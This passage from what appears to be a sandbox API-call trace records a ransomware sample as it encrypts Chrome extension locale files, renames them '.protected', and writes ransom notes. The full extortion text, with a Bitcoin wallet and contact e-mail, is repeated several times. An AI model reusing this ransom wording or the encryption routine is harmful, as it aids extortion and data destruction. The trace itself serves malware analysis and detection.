pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0080.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.650] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.650] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.651] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.651] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.651] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.651] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.651] CloseHandle (hObject=0x164) returned 1 [0080.651] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0080.651] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0080.651] 
wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT") returned 144 [0080.651] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0080.651] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0080.651] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\*") returned 146 [0080.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.652] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.652] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.652] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.652] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.652] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.652] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\.") returned 146 [0080.652] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.652] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.652] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.652] lstrcmpiW (lpString1="..", lpString2="Program Files 
(x86)") returned -1 [0080.652] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.652] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.652] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\..") returned 147 [0080.652] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.652] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.652] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.652] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.652] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.653] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.653] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.653] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.653] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.653] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.653] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.653] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.654] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.654] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc6, lpOverlapped=0x0) 
returned 1 [0080.654] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.654] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.654] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.654] CloseHandle (hObject=0x168) returned 1 [0080.654] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0080.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0080.655] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.655] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.655] 
wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0080.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.655] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.655] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.656] lstrlenA (lpString="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") returned 684 [0080.656] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.656] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.656] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.656] CloseHandle (hObject=0x164) returned 1 [0080.656] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0080.657] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro") returned 141 [0080.657] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0080.657] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0080.657] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\*") returned 143 [0080.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.657] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.657] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.657] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.657] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.657] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.657] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\.") returned 143 [0080.657] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.657] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.657] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.657] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.657] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.657] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.657] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.657] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\..") returned 144 [0080.657] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.657] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.657] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.657] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json") 
returned 155 [0080.657] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.657] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.657] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.657] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.658] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json") returned 155 [0080.658] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.658] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json") returned 155 [0080.658] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.658] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json") returned 155 [0080.658] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.658] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xaf, lpOverlapped=0x0) returned 1 [0080.659] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff51, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.659] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xaf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xaf, lpOverlapped=0x0) returned 1 [0080.659] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.659] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.659] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.659] CloseHandle (hObject=0x168) returned 1 [0080.659] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.protected") returned 165 [0080.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.protected")) returned 1 [0080.660] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.660] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.660] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0080.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.660] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
